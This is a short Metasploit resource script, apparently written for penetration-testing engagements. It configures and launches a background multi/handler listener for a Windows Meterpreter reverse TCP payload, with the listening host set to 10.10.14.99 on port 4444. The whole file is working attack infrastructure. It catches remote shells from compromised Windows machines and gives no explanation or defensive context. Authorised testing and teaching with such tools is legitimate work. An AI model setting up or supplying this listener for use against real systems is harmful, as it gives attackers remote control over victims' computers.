# === Windows x86/x64 Meterpreter reverse TCP handler ===
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp

# CHANGE THIS EACH ENGAGEMENT
set LHOST 10.10.14.99
set LPORT 4444

set ExitOnSession false
set EnableStageEncoding false

exploit -j -z

